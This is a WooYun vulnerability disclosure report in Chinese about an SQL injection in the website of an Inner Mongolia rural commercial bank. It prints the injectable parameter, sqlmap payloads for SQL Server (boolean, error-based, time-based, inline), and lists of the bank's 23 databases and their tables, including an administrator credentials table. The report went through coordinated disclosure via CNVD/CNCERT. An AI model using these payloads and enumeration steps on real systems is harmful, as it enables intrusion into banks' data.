当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144624

漏洞标题:内蒙古某银行主站SQL注入(DBA权限&23库大量表)

相关厂商:hlbrcb.com

漏洞作者: 暴走

提交时间:2015-10-03 12:24

修复时间:2015-11-26 08:28

公开时间:2015-11-26 08:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-03: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

吃完饭,没事干,挖挖洞...

详细说明:

内蒙古呼伦贝尔农商银行主站存在GET型SQL注入一枚,导致大量数据库信息泄露。

漏洞证明:

内蒙古呼伦贝尔农商银行主站存在注入一枚,可泄露23库,几百表。
SQL注入地址:http://**.**.**.**/TextNewsList.aspx?NTID=11(注入参数NTID)
数据库SQL Server 2008

sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Place: GET
Parameter: NTID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: NTID=11 AND 9320=9320
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: NTID=11 AND 5690=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (5690=5690) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(111)+CHAR(113)))
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: NTID=-4137 OR 6051=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: NTID=(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (8187=8187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(111)+CHAR(113))
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008


一共23库

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [23]:
[*] a1
[*] a2
[*] ERP
[*] ERPOA
[*] examDB
[*] ICCO
[*] KQ123
[*] lctj
[*] master
[*] model
[*] msdb
[*] MySchool
[*] MZMT
[*] NS_Web_DB
[*] ReportServer
[*] ReportServerTempDB
[*] sbgl
[*] sbgl1
[*] tempdb
[*] VCDB
[*] XHDCRM
[*] ybj0470
[*] zptest


当前数据库:NS_Web_DB

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current database:    'NS_Web_DB'


该数据库包含21表

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: NS_Web_DB
[21 tables]
+---------------+
| ApplyCompany  |
| ApplyPOS      |
| ApplyPersonal |
| ApplyWithdraw |
| Article       |
| ArticleClass  |
| Branch        |
| CenterM_Roles |
| CenterM_Users |
| Class         |
| Messageboard  |
| Messages      |
| NewsCategory  |
| PicNews       |
| S_Tree        |
| Survey        |
| SurveyOption  |
| SysLog        |
| TextNews      |
| UserRoles     |
| Users         |
+---------------+


管理员表: CenterM_Users

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: NS_Web_DB
Table: CenterM_Users
[6 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| Count    | int     |
| ID       | varchar |
| Name     | varchar |
| PassWord | varchar |
| RID      | int     |
| Status   | int     |
+----------+---------+


dump下管理表看看,管理员的密码都是弱密码。

20.png


a1数据库包含129表

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: a1
[129 tables]
+-----------------------+
| AtdDayResult          |
| AtdFixShiftD          |
| AtdFixShiftM          |
| AtdHoliday            |
| AtdMonthResult        |
| AtdProcRec            |
| AtdRecLeave           |
| AtdRecOver            |
| AtdRecRest            |
| AtdRecShift           |
| AtdRecord             |
| AtdResultSect         |
| AtdResultType         |
| AtdRule               |
| AtdRuleList           |
| AtdShift              |
| AtdShiftGroup         |
| AtdShiftSect          |
| AtdWeekend            |
| CardBalanceInfo       |
| CardGrade             |
| ChgAmountRecord       |
| ChgConsumeSect        |
| ChgRecord             |
| ConsumeLog            |
| CopyChgRecord         |
| CopyMngAccount        |
| CopyMngCardAdjust     |
| CopyMngCardChange     |
| CopyMngChgType        |
| CopyMngEquPos         |
| CopyMngMoneyChange    |
| CopyMngRepair         |
| CopyParam             |
| CpyCopierList         |
| CpyMngChgType         |
| CustomProperty        |
| DeviceParameter       |
| DrRecord              |
| DrTime                |
| DrTimeList            |
| EmplCustomProp        |
| EquBell               |
| EquBellList           |
| EquCard               |
| EquFinger             |
| EquList               |
| EquMsg                |
| EquMsgText            |
| EquReg                |
| ErrorChgRecord        |
| FPDrTime              |
| FPTimeArea            |
| FPTimeSect            |
| FPTimeTeam            |
| FixConsume            |
| FixConsumeSet         |
| FunParam              |
| HrDept                |
| HrEmployee            |
| HrLeaveEmpl           |
| HrTeam                |
| JSDrTime              |
| JSHolidayDate         |
| JiTimeConsume         |
| LogSize               |
| MngAccount            |
| MngBlackList          |
| MngCardAdjust         |
| MngCardChange         |
| MngCardType           |
| MngChgType            |
| MngEquPos             |
| MngMoneyChange        |
| MngOrgan              |
| MngRecAllowance       |
| MngRepair             |
| MngSquare             |
| PropGroup             |
| RegCardInfo           |
| ShiftCurDay           |
| ShiftNxtDay           |
| ShiftPreDay           |
| SysAllModule          |
| SysBinInfo            |
| SysDefDbGb            |
| SysDicSubType         |
| SysDicType            |
| SysFavorite           |
| SysFormsLang          |
| SysGrid               |
| SysGroupMember        |
| SysGroupRight         |
| SysGuide              |
| SysInfo               |
| SysIniIDCardNo        |
| SysLog                |
| SysMenuGroup          |
| SysOper               |
| SysOperGroup          |
| SysPackage            |
| SysQryConditionD      |
| SysQryConditionM      |
| SysRep                |
| SysTmpNum             |
| SysTxtSet             |
| SysUseModule          |
| TemplateD             |
| TemplateM             |
| Tmp150729150105500005 |
| Tmp150729152527373009 |
| TmpConsume            |
| TmpOnDuty             |
| TmpRealTime           |
| TmpRecord             |
| WageBankPaper         |
| WageCalcMode          |
| WageCalcResult        |
| WageEmpItemChange     |
| WageFixItemChange     |
| WageFunction          |
| WageItem              |
| WagePersonTax         |
| WagePersonnel         |
| WageWorkProc          |
| WageWorkProcMode      |
| WorkProcAdjust        |
| WorkProcRec           |
| consumedetailview     |
+-----------------------+


ERPOA包含100表:

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: ERPOA
[100 tables]
+--------------------+
| ERPAnPai           |
| ERPBBSBanKuai      |
| ERPBBSTieZi        |
| ERPBaoJia          |
| ERPBaoXiao         |
| ERPBook            |
| ERPBookJieHuan     |
| ERPBuMen           |
| ERPBuyChanPin      |
| ERPBuyOrder        |
| ERPCYDIC           |
| ERPCarInfo         |
| ERPCarShiYong      |
| ERPCarWeiHu        |
| ERPContract        |
| ERPContractChanPin |
| ERPCrmSetting      |
| ERPCustomFuWu      |
| ERPCustomHuiFang   |
| ERPCustomInfo      |
| ERPCustomNeed      |
| ERPDanWeiInfo      |
| ERPDangAn          |
| ERPDengJi          |
| ERPFeiYong         |
| ERPFileList        |
| ERPFlowType        |
| ERPForm            |
| ERPFormType        |
| ERPGongGao         |
| ERPGuDing          |
| ERPGuDingJiLu      |
| ERPHuiBao          |
| ERPJSDIC           |
| ERPJiangCheng      |
| ERPJiaoSe          |
| ERPJinDu           |
| ERPJuanKu          |
| ERPKaoHe           |
| ERPKaoHeRW         |
| ERPKaoHeXM         |
| ERPKaoQin          |
| ERPKaoQinSetting   |
| ERPKuaiDi          |
| ERPLanEmail        |
| ERPLiRun           |
| ERPLinkLog         |
| ERPLinkMan         |
| ERPMeeting         |
| ERPMenu            |
| ERPMoBan           |
| ERPMobile          |
| ERPNetEmail        |
| ERPOfficething     |
| ERPPeiXun          |
| ERPPeiXunRiJi      |
| ERPPeiXunXiaoGuo   |
| ERPPinShen         |
| ERPProduct         |
| ERPProductType     |
| ERPProject         |
| ERPRedHead         |
| ERPRenShiHeTong    |
| ERPRiChangBaoXiao  |
| ERPRiZhi           |
| ERPSaveFileName    |
| ERPSerils          |
| ERPShenPi          |
| ERPShiShi          |
| ERPShouKuan        |
| ERPSongHuoDan      |
| ERPSongYang        |
| ERPSource          |
| ERPSupplyLink      |
| ERPSupplys         |
| ERPSystemSetting   |
| ERPTalkInfo        |
| ERPTalkOnlineUser  |
| ERPTalkSetting     |
| ERPTelFile         |
| ERPTongXunLu       |
| ERPTouSu           |
| ERPUser            |
| ERPUserDesk        |
| ERPVote            |
| ERPWorkFlow        |
| ERPWorkFlowJieDian |
| ERPWorkPlan        |
| ERPWorkRiZhi       |
| ERPWorkToDo        |
| ERPWuLiuQingKuang  |
| ERPYinZhang        |
| ERPYinZhangLog     |
| ERPZhiShiType      |
| ERPZhiSiKu         |
| S_GroupMenu        |
| S_Role             |
| S_RoleMenu         |
| S_Times            |
| dtproperties       |
+--------------------+


想看那个看哪个!

修复方案:

银行系统需要更加重视安全啊。

版权声明:转载请注明来源 暴走@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-12 08:26

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给内蒙古分中心,由其后续协调网站管理单位处置.

最新状态:

暂无